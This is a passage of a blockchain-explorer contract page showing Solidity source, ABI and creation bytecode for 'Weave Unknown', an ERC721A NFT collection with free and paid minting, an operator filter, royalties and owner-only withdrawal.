        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // `balance` and `numberMinted` have a maximum limit of 2**64.
        // `tokenId` has a maximum limit of 2**256.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            uint256 toMasked;
            uint256 end = startTokenId + quantity;

            // Use assembly to loop and emit the `Transfer` event for gas savings.
            // The duplicated `log4` removes an extra check and reduces stack juggling.
            // The assembly, together with the surrounding Solidity code, have been
            // delicately arranged to nudge the compiler into producing optimized opcodes.
            assembly {
                // Mask `to` to the lower 160 bits, in case the upper bits somehow aren't clean.
                toMasked := and(to, _BITMASK_ADDRESS)
                // Emit the `Transfer` event.
                log4(
                    0, // Start of data (0, since no data).
                    0, // End of data (0, since no data).
                    _TRANSFER_EVENT_SIGNATURE, // Signature.
                    0, // `address(0)`.
                    toMasked, // `to`.
                    startTokenId // `tokenId`.
                )

                // The `iszero(eq(,))` check ensures that large values of `quantity`
                // that overflows uint256 will make the loop run out of gas.
                // The compiler will optimize the `iszero` away for performance.
                for {
                    let tokenId := add(startTokenId, 1)
                } iszero(eq(tokenId, end)) {
                    tokenId := add(tokenId, 1)
                } {
                    // Emit the `Transfer` event. Similar to above.
                    log4(0, 0, _TRANSFER_EVENT_SIGNATURE, 0, toMasked, tokenId)
                }
            }
            if (toMasked == 0) revert MintToZeroAddress();

            _currentIndex = end;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * This function is intended for efficient minting only during contract creation.
     *
     * It emits only one {ConsecutiveTransfer} as defined in
     * [ERC2309](https://eips.ethereum.org/EIPS/eip-2309),
     * instead of a sequence of {Transfer} event(s).
     *
     * Calling this function outside of contract creation WILL make your contract
     * non-compliant with the ERC721 standard.
     * For full ERC721 compliance, substituting ERC721 {Transfer} event(s) with the ERC2309
     * {ConsecutiveTransfer} event is only permissible during contract creation.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {ConsecutiveTransfer} event.
     */
    function _mintERC2309(address to, uint256 quantity) internal virtual {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();
        if (quantity > _MAX_MINT_ERC2309_QUANTITY_LIMIT) revert MintERC2309QuantityExceedsLimit();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are unrealistic due to the above check for `quantity` to be below the limit.
        unchecked {
            // Updates:
            // - `balance += quantity`.
            // - `numberMinted += quantity`.
            //
            // We can directly add to the `balance` and `numberMinted`.
            _packedAddressData[to] += quantity * ((1 << _BITPOS_NUMBER_MINTED) | 1);

            // Updates:
            // - `address` to the owner.
            // - `startTimestamp` to the timestamp of minting.
            // - `burned` to `false`.
            // - `nextInitialized` to `quantity == 1`.
            _packedOwnerships[startTokenId] = _packOwnershipData(
                to,
                _nextInitializedFlag(quantity) | _nextExtraData(address(0), to, 0)
            );

            emit ConsecutiveTransfer(startTokenId, startTokenId + quantity - 1, address(0), to);

            _currentIndex = startTokenId + quantity;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement
     * {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * See {_mint}.
     *
     * Emits a {Transfer} event for each mint.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal virtual {
        _mint(to, quantity);

        unchecked {
            if (to.code.length != 0) {
                uint256 end = _currentIndex;
                uint256 index = end - quantity;
                do {
                    if (!_checkContractOnERC721Received(address(0), to, index++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (index < end);
                // Reentrancy protection.
                if (_currentIndex != end) revert();
            }
        }
    }

    /**
     * @dev Equivalent to `_safeMint(to, quantity, '')`.
     */
    function _safeMint(address to, uint256 quantity) internal virtual {
        _safeMint(to, quantity, '');
    }

    // =============================================================
    //                        BURN OPERATIONS
    // =============================================================

    /**
     * @dev Equivalent to `_burn(tokenId, false)`.
     */
    function _burn(uint256 tokenId) internal virtual {
        _burn(tokenId, false);
    }

    /**
     * @dev Destroys `tokenId`.
     * The approval is cleared when the token is burned.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     *
     * Emits a {Transfer} event.
     */
    function _burn(uint256 tokenId, bool approvalCheck) internal virtual {
        uint256 prevOwnershipPacked = _packedOwnershipOf(tokenId);

        address from = address(uint160(prevOwnershipPacked));

        (uint256 approvedAddressSlot, address approvedAddress) = _getApprovedSlotAndAddress(tokenId);

        if (approvalCheck) {
            // The nested ifs save around 20+ gas over a compound boolean condition.
            if (!_isSenderApprovedOrOwner(approvedAddress, from, _msgSenderERC721A()))
                if (!isApprovedForAll(from, _msgSenderERC721A())) revert TransferCallerNotOwnerNorApproved();
        }

        _beforeTokenTransfers(from, address(0), tokenId, 1);

        // Clear approvals from the previous owner.
        assembly {
            if approvedAddress {
                // This is equivalent to `delete _tokenApprovals[tokenId]`.
                sstore(approvedAddressSlot, 0)
            }
        }

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as `tokenId` would have to be 2**256.
        unchecked {
            // Updates:
            // - `balance -= 1`.
            // - `numberBurned += 1`.
            //
            // We can directly decrement the balance, and increment the number burned.
            // This is equivalent to `packed -= 1; packed += 1 << _BITPOS_NUMBER_BURNED;`.
            _packedAddressData[from] += (1 << _BITPOS_NUMBER_BURNED) - 1;

            // Updates:
            // - `address` to the last owner.
            // - `startTimestamp` to the timestamp of burning.
            // - `burned` to `true`.
            // - `nextInitialized` to `true`.
            _packedOwnerships[tokenId] = _packOwnershipData(
                from,
                (_BITMASK_BURNED | _BITMASK_NEXT_INITIALIZED) | _nextExtraData(from, address(0), prevOwnershipPacked)
            );

            // If the next slot may not have been initialized (i.e. `nextInitialized == false`) .
            if (prevOwnershipPacked & _BITMASK_NEXT_INITIALIZED == 0) {
                uint256 nextTokenId = tokenId + 1;
                // If the next slot's address is zero and not burned (i.e. packed value is zero).
                if (_packedOwnerships[nextTokenId] == 0) {
                    // If the next slot is within bounds.
                    if (nextTokenId != _currentIndex) {
                        // Initialize the next slot to maintain correctness for `ownerOf(tokenId + 1)`.
                        _packedOwnerships[nextTokenId] = prevOwnershipPacked;
                    }
                }
            }
        }

        emit Transfer(from, address(0), tokenId);
        _afterTokenTransfers(from, address(0), tokenId, 1);

        // Overflow not possible, as _burnCounter cannot be exceed _currentIndex times.
        unchecked {
            _burnCounter++;
        }
    }

    // =============================================================
    //                     EXTRA DATA OPERATIONS
    // =============================================================

    /**
     * @dev Directly sets the extra data for the ownership data `index`.
     */
    function _setExtraDataAt(uint256 index, uint24 extraData) internal virtual {
        uint256 packed = _packedOwnerships[index];
        if (packed == 0) revert OwnershipNotInitializedForExtraData();
        uint256 extraDataCasted;
        // Cast `extraData` with assembly to avoid redundant masking.
        assembly {
            extraDataCasted := extraData
        }
        packed = (packed & _BITMASK_EXTRA_DATA_COMPLEMENT) | (extraDataCasted << _BITPOS_EXTRA_DATA);
        _packedOwnerships[index] = packed;
    }

    /**
     * @dev Called during each token transfer to set the 24bit `extraData` field.
     * Intended to be overridden by the cosumer contract.
     *
     * `previousExtraData` - the value of `extraData` before transfer.
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, `from`'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     * - When `to` is zero, `tokenId` will be burned by `from`.
     * - `from` and `to` are never both zero.
     */
    function _extraData(
        address from,
        address to,
        uint24 previousExtraData
    ) internal view virtual returns (uint24) {}

    /**
     * @dev Returns the next extra data for the packed ownership data.
     * The returned result is shifted into position.
     */
    function _nextExtraData(
        address from,
        address to,
        uint256 prevOwnershipPacked
    ) private view returns (uint256) {
        uint24 extraData = uint24(prevOwnershipPacked >> _BITPOS_EXTRA_DATA);
        return uint256(_extraData(from, to, extraData)) << _BITPOS_EXTRA_DATA;
    }

    // =============================================================
    //                       OTHER OPERATIONS
    // =============================================================

    /**
     * @dev Returns the message sender (defaults to `msg.sender`).
     *
     * If you are writing GSN compatible contracts, you need to override this function.
     */
    function _msgSenderERC721A() internal view virtual returns (address) {
        return msg.sender;
    }

    /**
     * @dev Converts a uint256 to its ASCII string decimal representation.
     */
    function _toString(uint256 value) internal pure virtual returns (string memory str) {
        assembly {
            // The maximum value of a uint256 contains 78 digits (1 byte per digit), but
            // we allocate 0xa0 bytes to keep the free memory pointer 32-byte word aligned.
            // We will need 1 word for the trailing zeros padding, 1 word for the length,
            // and 3 words for a maximum of 78 digits. Total: 5 * 0x20 = 0xa0.
            let m := add(mload(0x40), 0xa0)
            // Update the free memory pointer to allocate.
            mstore(0x40, m)
            // Assign the `str` to the end.
            str := sub(m, 0x20)
            // Zeroize the slot after the string.
            mstore(str, 0)

            // Cache the end of the memory to calculate the length later.
            let end := str

            // We write the string from rightmost digit to leftmost digit.
            // The following is essentially a do-while loop that also handles the zero case.
            // prettier-ignore
            for { let temp := value } 1 {} {
                str := sub(str, 1)
                // Write the character to the pointer.
                // The ASCII index of the '0' character is 48.
                mstore8(str, add(48, mod(temp, 10)))
                // Keep dividing `temp` until zero.
                temp := div(temp, 10)
                // prettier-ignore
                if iszero(temp) { break }
            }

            let length := sub(end, str)
            // Move the pointer 32 bytes leftwards to make room for the length.
            str := sub(str, 0x20)
            // Store the length.
            mstore(str, length)
        }
    }
}


interface IOperatorFilterRegistry {
    function isOperatorAllowed(address registrant, address operator) external view returns (bool);
    function register(address registrant) external;
    function registerAndSubscribe(address registrant, address subscription) external;
    function registerAndCopyEntries(address registrant, address registrantToCopy) external;
    function unregister(address addr) external;
    function updateOperator(address registrant, address operator, bool filtered) external;
    function updateOperators(address registrant, address[] calldata operators, bool filtered) external;
    function updateCodeHash(address registrant, bytes32 codehash, bool filtered) external;
    function updateCodeHashes(address registrant, bytes32[] calldata codeHashes, bool filtered) external;
    function subscribe(address registrant, address registrantToSubscribe) external;
    function unsubscribe(address registrant, bool copyExistingEntries) external;
    function subscriptionOf(address addr) external returns (address registrant);
    function subscribers(address registrant) external returns (address[] memory);
    function subscriberAt(address registrant, uint256 index) external returns (address);
    function copyEntriesOf(address registrant, address registrantToCopy) external;
    function isOperatorFiltered(address registrant, address operator) external returns (bool);
    function isCodeHashOfFiltered(address registrant, address operatorWithCode) external returns (bool);
    function isCodeHashFiltered(address registrant, bytes32 codeHash) external returns (bool);
    function filteredOperators(address addr) external returns (address[] memory);
    function filteredCodeHashes(address addr) external returns (bytes32[] memory);
    function filteredOperatorAt(address registrant, uint256 index) external returns (address);
    function filteredCodeHashAt(address registrant, uint256 index) external returns (bytes32);
    function isRegistered(address addr) external returns (bool);
    function codeHashOf(address addr) external returns (bytes32);
}


/**
 * @title  OperatorFilterer
 * @notice Abstract contract whose constructor automatically registers and optionally subscribes to or copies another
 *         registrant's entries in the OperatorFilterRegistry.
 * @dev    This smart contract is meant to be inherited by token contracts so they can use the following:
 *         - `onlyAllowedOperator` modifier for `transferFrom` and `safeTransferFrom` methods.
 *         - `onlyAllowedOperatorApproval` modifier for `approve` and `setApprovalForAll` methods.
 */
abstract contract OperatorFilterer {
    error OperatorNotAllowed(address operator);

    IOperatorFilterRegistry public constant OPERATOR_FILTER_REGISTRY =
        IOperatorFilterRegistry(0x000000000000AAeB6D7670E522A718067333cd4E);

    constructor(address subscriptionOrRegistrantToCopy, bool subscribe) {
        // If an inheriting token contract is deployed to a network without the registry deployed, the modifier
        // will not revert, but the contract will need to be registered with the registry once it is deployed in
        // order for the modifier to filter addresses.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (subscribe) {
                OPERATOR_FILTER_REGISTRY.registerAndSubscribe(address(this), subscriptionOrRegistrantToCopy);
            } else {
                if (subscriptionOrRegistrantToCopy != address(0)) {
                    OPERATOR_FILTER_REGISTRY.registerAndCopyEntries(address(this), subscriptionOrRegistrantToCopy);
                } else {
                    OPERATOR_FILTER_REGISTRY.register(address(this));
                }
            }
        }
    }

    modifier onlyAllowedOperator(address from) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            // Allow spending tokens from addresses with balance
            // Note that this still allows listings and marketplaces with escrow to transfer tokens if transferred
            // from an EOA.
            if (from == msg.sender) {
                _;
                return;
            }
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), msg.sender)) {
                revert OperatorNotAllowed(msg.sender);
            }
        }
        _;
    }

    modifier onlyAllowedOperatorApproval(address operator) virtual {
        // Check registry code length to facilitate testing in environments without a deployed registry.
        if (address(OPERATOR_FILTER_REGISTRY).code.length > 0) {
            if (!OPERATOR_FILTER_REGISTRY.isOperatorAllowed(address(this), operator)) {
                revert OperatorNotAllowed(operator);
            }
        }
        _;
    }
}

/**
 * @title  DefaultOperatorFilterer
 * @notice Inherits from OperatorFilterer and automatically subscribes to the default OpenSea subscription.
 */
abstract contract TheOperatorFilterer is OperatorFilterer {
    address constant DEFAULT_SUBSCRIPTION = address(0x3cc6CddA760b79bAfa08dF41ECFA224f810dCeB6);
    address public owner;

    constructor() OperatorFilterer(DEFAULT_SUBSCRIPTION, true) {}
}


contract WeaveUnknown is ERC721A, TheOperatorFilterer {

    string uri = "ipfs://bafybeigxiiim6mvlk35llycoofriy2joyvrxcjohv6adrjvyh6rus5z454/";

    uint256 public maxSupply = 500;

    uint256 public mintPrice = 0.002 ether;

    uint256 public maxFreeMintAmountPerTx = 1;

    uint256 public maxMintAmountPerWallet = 5;

    mapping(address => uint256) private _userForFree;

    mapping(uint256 => uint256) private _userMinted;

    function publicMint(uint256 amount) payable public {
        require(totalSupply() + amount <= maxSupply);
        _mint(amount);
    }

    function _mint(uint256 amount) internal {
        if (msg.value == 0) {
            require(amount == 1);
            if (totalSupply() > maxSupply / 5) {
                require(_userMinted[block.number] < FreeNum() 
                && _userForFree[tx.origin] < maxFreeMintAmountPerTx );
                _userForFree[tx.origin]++;
                _userMinted[block.number]++;
            }
            _safeMint(msg.sender, 1);
        } else {
            require(msg.value >= mintPrice * amount);
            _safeMint(msg.sender, amount);
        }
    }

    function reserve(address addr, uint256 amount) public onlyOwner {
        require(totalSupply() + amount <= maxSupply);
        _safeMint(addr, amount);
    }
    
    modifier onlyOwner {
        require(owner == msg.sender);
        _;
    }

    constructor() ERC721A("Part 1 Weave Unknown", "WU") {
        owner = msg.sender;
        maxMintAmountPerWallet = 10;
    }

    function setURi(string memory u) public onlyOwner {
        uri = u;
    }

    function tokenURI(uint256 tokenId) public view override returns (string memory) {
        return string(abi.encodePacked(uri, _toString(tokenId), ".json"));
    }

    function setFreePerAddr(uint256 maxTx, uint256 maxS) external onlyOwner {
        maxFreeMintAmountPerTx = maxTx;
        maxSupply = maxS;
    }

    function FreeNum() internal returns (uint256){
        return (maxSupply - totalSupply()) / 12;
    }

    function royaltyInfo(uint256 _tokenId, uint256 _salePrice) public view virtual returns (address, uint256) {
        uint256 royaltyAmount = (_salePrice * 50) / 1000;
        return (owner, royaltyAmount);
    }

    function withdraw() external onlyOwner {
        payable(msg.sender).transfer(address(this).balance);
    }

    function setApprovalForAll(address operator, bool approved) public override onlyAllowedOperatorApproval(operator) {
        super.setApprovalForAll(operator, approved);
    }

    function approve(address operator, uint256 tokenId) public payable override onlyAllowedOperatorApproval(operator) {
        super.approve(operator, tokenId);
    }

    function transferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.transferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId) public payable override onlyAllowedOperator(from) {
        super.safeTransferFrom(from, to, tokenId);
    }

    function safeTransferFrom(address from, address to, uint256 tokenId, bytes memory data)
        public
        payable
        override
        onlyAllowedOperator(from)
    {
        super.safeTransferFrom(from, to, tokenId, data);
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"ApprovalCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"ApprovalQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"BalanceQueryForZeroAddress","type":"error"},{"inputs":[],"name":"MintERC2309QuantityExceedsLimit","type":"error"},{"inputs":[],"name":"MintToZeroAddress","type":"error"},{"inputs":[],"name":"MintZeroQuantity","type":"error"},{"inputs":[{"internalType":"address","name":"operator","type":"address"}],"name":"OperatorNotAllowed","type":"error"},{"inputs":[],"name":"OwnerQueryForNonexistentToken","type":"error"},{"inputs":[],"name":"OwnershipNotInitializedForExtraData","type":"error"},{"inputs":[],"name":"TransferCallerNotOwnerNorApproved","type":"error"},{"inputs":[],"name":"TransferFromIncorrectOwner","type":"error"},{"inputs":[],"name":"TransferToNonERC721ReceiverImplementer","type":"error"},{"inputs":[],"name":"TransferToZeroAddress","type":"error"},{"inputs":[],"name":"URIQueryForNonexistentToken","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"fromTokenId","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"toTokenId","type":"uint256"},{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"}],"name":"ConsecutiveTransfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"OPERATOR_FILTER_REGISTRY","outputs":[{"internalType":"contract IOperatorFilterRegistry","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreeMintAmountPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxMintAmountPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mintPrice","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"publicMint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"addr","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"reserve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"},{"internalType":"uint256","name":"_salePrice","type":"uint256"}],"name":"royaltyInfo","outputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"maxTx","type":"uint256"},{"internalType":"uint256","name":"maxS","type":"uint256"}],"name":"setFreePerAddr","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"u","type":"string"}],"name":"setURi","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526040518060800160405280604381526020016200380160439139600990816200002e9190620005dc565b506101f4600a5566071afd498d0000600b556001600c556005600d553480156200005757600080fd5b50733cc6cdda760b79bafa08df41ecfa224f810dceb660016040518060400160405280601481526020017f50617274203120576561766520556e6b6e6f776e0000000000000000000000008152506040518060400160405280600281526020017f57550000000000000000000000000000000000000000000000000000000000008152508160029081620000ec9190620005dc565b508060039081620000fe9190620005dc565b506200010f6200035d60201b60201c565b600081905550505060006daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff163b11156200030c578015620001d2576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16637d3e3dbe30846040518363ffffffff1660e01b81526004016200019892919062000708565b600060405180830381600087803b158015620001b357600080fd5b505af1158015620001c8573d6000803e3d6000fd5b505050506200030b565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16146200028c576daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff1663a0af290330846040518363ffffffff1660e01b81526004016200025292919062000708565b600060405180830381600087803b1580156200026d57600080fd5b505af115801562000282573d6000803e3d6000fd5b505050506200030a565b6daaeb6d7670e522a718067333cd4e73ffffffffffffffffffffffffffffffffffffffff16634420e486306040518263ffffffff1660e01b8152600401620002d5919062000735565b600060405180830381600087803b158015620002f057600080fd5b505af115801562000305573d6000803e3d6000fd5b505050505b5b5b505033600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600a600d8190555062000752565b600090565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620003e457607f821691505b602082108103620003fa57620003f96200039c565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620004647fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000425565b62000470868362000425565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620004bd620004b7620004b18462000488565b62000492565b62000488565b9050919050565b6000819050919050565b620004d9836200049c565b620004f1620004e882620004c4565b84845462000432565b825550505050565b600090565b62000508620004f9565b62000515818484620004ce565b505050565b5b818110156200053d5762000531600082620004fe565b6001810190506200051b565b5050565b601f8211156200058c57620005568162000400565b620005618462000415565b8101602085101562000571578190505b62000589620005808562000415565b8301826200051a565b50505b505050565b600082821c905092915050565b6000620005b16000198460080262000591565b1980831691505092915050565b6000620005cc83836200059e565b9150826002028217905092915050565b620005e78262000362565b67ffffffffffffffff8111156200060357620006026200036d565b5b6200060f8254620003cb565b6200061c82828562000541565b600060209050601f8311600181146200065457600084156200063f578287015190505b6200064b8582620005be565b865550620006bb565b601f198416620006648662000400565b60005b828110156200068e5784890151825560018201915060208501945060208101905062000667565b86831015620006ae5784890151620006aa601f8916826200059e565b8355505b6001600288020188555050505b505050505050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000620006f082620006c3565b9050919050565b6200070281620006e3565b82525050565b60006040820190506200071f6000830185620006f7565b6200072e6020830184620006f7565b9392505050565b60006020820190506200074c6000830184620006f7565b92915050565b61309f80620007626000396000f3fe60806040526004361061019c5760003560e01c806342842e0e116100ec578063a22cb4651161008a578063c87b56dd11610064578063c87b56dd14610572578063cc47a40b146105af578063d5abeb01146105d8578063e985e9c5146106035761019c565b8063a22cb46514610502578063b88d4fde1461052b578063bc951b91146105475761019c565b80636817c76c116100c65780636817c76c1461044457806370a082311461046f5780638da5cb5b146104ac57806395d89b41146104d75761019c565b806342842e0e146103c0578063604906dc146103dc5780636352211e146104075761019c565b806323b872dd1161015957806338b08fd41161013357806338b08fd41461032c5780633a233f89146103555780633ccfd60b1461037e57806341f43434146103955761019c565b806323b872dd146102b65780632a55205a146102d25780632db11544146103105761019c565b806301ffc9a7146101a1578063028043b1146101de57806306fdde0314610207578063081812fc14610232578063095ea7b31461026f57806318160ddd1461028b575b600080fd5b3480156101ad57600080fd5b506101c860048036038101906101c39190612271565b610640565b6040516101d591906122b9565b60405180910390f35b3480156101ea57600080fd5b506102056004803603810190610200919061241a565b6106d2565b005b34801561021357600080fd5b5061021c61073f565b60405161022991906124e2565b60405180910390f35b34801561023e57600080fd5b506102596004803603810190610254919061253a565b6107d1565b60405161026691906125a8565b60405180910390f35b610289600480360381019061028491906125ef565b610850565b005b34801561029757600080fd5b506102a061095a565b6040516102ad919061263e565b60405180910390f35b6102d060048036038101906102cb9190612659565b610971565b005b3480156102de57600080fd5b506102f960048036038101906102f491906126ac565b610ac1565b6040516103079291906126ec565b60405180910390f35b61032a6004803603810190610325919061253a565b610b12565b005b34801561033857600080fd5b50610353600480360381019061034e91906126ac565b610b3f565b005b34801561036157600080fd5b5061037c60048036038101906103779190612715565b610bab565b005b34801561038a57600080fd5b50610393610c14565b005b3480156103a157600080fd5b506103aa610cb7565b6040516103b791906127b4565b60405180910390f35b6103da60048036038101906103d59190612659565b610cc9565b005b3480156103e857600080fd5b506103f1610e19565b6040516103fe919061263e565b60405180910390f35b34801561041357600080fd5b5061042e6004803603810190610429919061253a565b610e1f565b60405161043b91906125a8565b60405180910390f35b34801561045057600080fd5b50610459610e31565b604051610466919061263e565b60405180910390f35b34801561047b57600080fd5b50610496600480360381019061049191906127cf565b610e37565b6040516104a3919061263e565b60405180910390f35b3480156104b857600080fd5b506104c1610eef565b6040516104ce91906125a8565b60405180910390f35b3480156104e357600080fd5b506104ec610f15565b6040516104f991906124e2565b60405180910390f35b34801561050e57600080fd5b5061052960048036038101906105249190612828565b610fa7565b005b61054560048036038101906105409190612909565b6110b1565b005b34801561055357600080fd5b5061055c611204565b604051610569919061263e565b60405180910390f35b34801561057e57600080fd5b506105996004803603810190610594919061253a565b61120a565b6040516105a691906124e2565b60405180910390f35b3480156105bb57600080fd5b506105d660048036038101906105d191906125ef565b61123e565b005b3480156105e457600080fd5b506105ed6112c7565b6040516105fa919061263e565b60405180910390f35b34801561060f57600080fd5b5061062a60048036038101906106259190612715565b6112cd565b60405161063791906122b9565b60405180910390f35b60006301ffc9a760e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916148061069b57506380ac58cd60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b806106cb5750635b5e139f60e01b827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b9050919050565b3373ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461072c57600080fd5b806009908161073b9190612b